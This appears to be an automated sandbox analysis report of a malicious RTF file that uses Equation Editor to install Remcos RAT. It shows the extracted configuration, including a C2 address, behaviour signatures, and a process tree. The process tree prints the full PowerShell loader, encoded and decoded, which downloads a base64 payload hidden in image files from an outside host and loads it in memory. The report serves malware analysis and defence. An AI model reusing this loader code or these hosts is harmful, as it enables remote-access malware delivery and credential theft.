Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    16/03/2024, 02:41

General

  • Target

    aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf

  • Size

    70KB

  • MD5

    cae8bb9d33e2340998ba5f75ad37f803

  • SHA1

    75e142060680509acade4921ea417e1d438a34fd

  • SHA256

    aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030

  • SHA512

    5b5ba31eef6383798733fcb5bbbbe0b28a35b8962207b8a08c494aa18ce48cf4f296af18299b8ddff51b7d6eb07d4864b3ddf4f95bebc8c76959f8ba1e0f8d98

  • SSDEEP

    1536:z8dfmjJH0y/OSefByvp/9/7otRf9rdO5WeIGLTlGrzYNY:z8dfW0yvDToXf9rd2WeI0RGYNY

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

107.172.31.178:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-NVSJ5U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 23 IoCs
  • Detects executables built or packed with MPress PE compressor 12 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs
  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 6 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:752
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$leitariga = 'ZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAB7ACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAbABpAG4AawBzACkAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgAEAAKAApADsAIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAIAA9ACAAJABsAGkAbgBrAHMAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAJABsAGkAbgBrAHMALgBMAGUAbgBnAHQAaAA7ACAAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBrACAAaQBuACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACkAIAB7ACAAdAByAHkAIAB7ACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAArAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGwAaQBuAGsAKQAgAH0AIABjAGEAdABjAGgAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQAgAH0AOwAgAHIAZQB0AHUAcgBuACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAB9ADsAIAAkAGwAaQBuAGsAcwAgAD0AIABAACgAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwAxADYAJwAsACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQA0AC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwA1ADAAJwApADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAAkAGwAaQBuAGsAcwA7ACAAaQBmACAAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBQAFIATwBKAEUAVABPAEEAVQBUAE8ATQBBAEMAQQBPAC4AVgBCAC4ASABvAG0AZQAnACkAOwAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AUwBTAEkASwAvAHIAbABrAC8AcABwAG0AYQB4AC8ANwAwADEALgAzADQAMgAuADUAOAAxAC4ANwA0ADEALwAvADoAcAB0AHQAaAAnACAALAAgACcAMQAnACAALAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAgACwAIAAnAEsASQBTAFMAJwAsACcAUgBlAGcAQQBzAG0AJwAsACcAJwApACkAfQAgAH0A';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $leitariga));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2868
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/753/713/original/new_image.jpg?1709908316', 'https://uploaddeimagens.com.br/images/004/753/714/original/new_image.jpg?1709908350'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SSIK/rlk/ppmax/701.342.581.741//:ptth' , '1' , 'C:\ProgramData\' , 'KISS','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2948
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\KISS.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1992
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1876
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\temlvwvkkoowfcwiwjggnbdb"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2116
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\dgadnpglywgbqikmnutaqnxskvs"
                6⤵
                • Accesses Microsoft Outlook accounts
                PID:3000
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\oafoohrfueyosogqwfgbbskbtckgwv"
                6⤵
                  PID:2196

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        67KB

        MD5

        753df6889fd7410a2e9fe333da83a429

        SHA1

        3c425f16e8267186061dd48ac1c77c122962456e

        SHA256

        b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

        SHA512

        9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        e04b41d841b9caddb53f4e6e9340ebf3

        SHA1

        59fefd0f735f2f019934ec3d8f9e9ae13480e984

        SHA256

        3eb2faa071346a1c4cba22993d90a5ba530ae197e227b8e44fe888292112584d

        SHA512

        055cddc813520c4c1a671988a18ebbd7fabeaf837cd6fd232348f835a5d1a54cb6f2d2566ae5828ab6965dc25f31c9b5e1a15a10cf1cd6e7531a6c3c0f903535

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        242B

        MD5

        a7be4d705fb91d709ca96fe0d4e8818f

        SHA1

        cbca322e6b7695224c05816fedbea7f1c8dc732a

        SHA256

        3e28cfa385806c50fc2494c6000ec522baa9536d5f62e65839bdf22b41713773

        SHA512

        9803fcf4f013eabd702de5cc6d601e2bc306b49d253c3f384ca3501fd94a63ced207cc47dfbe1aea65827febe4fa780e470d61bd086aa60d8c77ad10392db71f

      • C:\Users\Admin\AppData\Local\Temp\Tar236D.tmp

        Filesize

        175KB

        MD5

        dd73cead4b93366cf3465c8cd32e2796

        SHA1

        74546226dfe9ceb8184651e920d1dbfb432b314e

        SHA256

        a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

        SHA512

        ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

      • C:\Users\Admin\AppData\Local\Temp\temlvwvkkoowfcwiwjggnbdb

        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

        Filesize

        20KB

        MD5

        a4ffbd374b8d62085a5b092eea1fa31b

        SHA1

        209e7de00208ee975d49a745a7c4895eff4b47d1

        SHA256

        40aafadbb75f610e72d6fea6872a56f04b6c0cffc1e880f63bcf397e3e32ee0f

        SHA512

        0e37a05801eef10ca9c98260949ce40bfb21ae5a3b05a7d6a7e7628023cbd03ecd071762151d0fc319d9b3de8234dbc1096d298b8f078bd5883bf9422bdd4848

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\23M67FD3QQYHPKTFS9GG.temp

        Filesize

        7KB

        MD5

        bfad9661c0ce96fdf5519d8a47e70bd8

        SHA1

        70fc7cedc9e9b463c8403d396878d51b944862cb

        SHA256

        1f23ae4122884929505942c1120d7e63b34170971be1c48fda447007a862ef7f

        SHA512

        b2e89620fee0141a50ef35d0b436b24fbda9eeac3f370891db41ae7fd3178da52cfb65e4488b21802449360c0082681f3a0f2690d33397869a888c0b749f835f

      • C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs

        Filesize

        33KB

        MD5

        da24a3f9677942db1e73b0ef5d2011a4

        SHA1

        0ee17d73b3e26fe1c8b6680b92c305a4d850685c

        SHA256

        98e179fe22de663f2f6127de1354c0d14609c43ca0e644f320310104585f90ce

        SHA512

        46549a6ee806cf7c48328e80b124928258bed5ad182618c25b4bcbf61173ace8eb502f28ce5bf4dd9ba862d988a1c3a95ec86c9ce539fab6c30318c525138615

      • memory/1876-159-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-165-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-211-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-212-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-213-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-232-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-233-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-208-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-234-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-174-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-176-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-172-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-171-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-170-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-167-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-179-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-148-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-150-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-152-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-153-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-155-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-175-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-157-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-161-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-163-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

      • memory/1876-209-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1876-177-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/1992-143-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/1992-144-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/1992-142-0x00000000028E0000-0x0000000002920000-memory.dmp

        Filesize

        256KB

      • memory/1992-141-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/1992-138-0x00000000028E0000-0x0000000002920000-memory.dmp

        Filesize

        256KB

      • memory/1992-180-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2116-198-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2116-207-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2116-195-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2116-190-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2116-187-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2116-183-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2784-231-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2784-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2784-130-0x00000000717FD000-0x0000000071808000-memory.dmp

        Filesize

        44KB

      • memory/2784-2-0x00000000717FD000-0x0000000071808000-memory.dmp

        Filesize

        44KB

      • memory/2784-0-0x000000002F191000-0x000000002F192000-memory.dmp

        Filesize

        4KB

      • memory/2868-131-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2868-15-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2868-137-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2868-173-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2868-17-0x0000000002BF0000-0x0000000002C30000-memory.dmp

        Filesize

        256KB

      • memory/2868-16-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2868-22-0x0000000002BF0000-0x0000000002C30000-memory.dmp

        Filesize

        256KB

      • memory/2948-168-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2948-145-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2948-29-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/2948-28-0x000000006B810000-0x000000006BDBB000-memory.dmp

        Filesize

        5.7MB

      • memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/3000-199-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/3000-193-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/3000-189-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB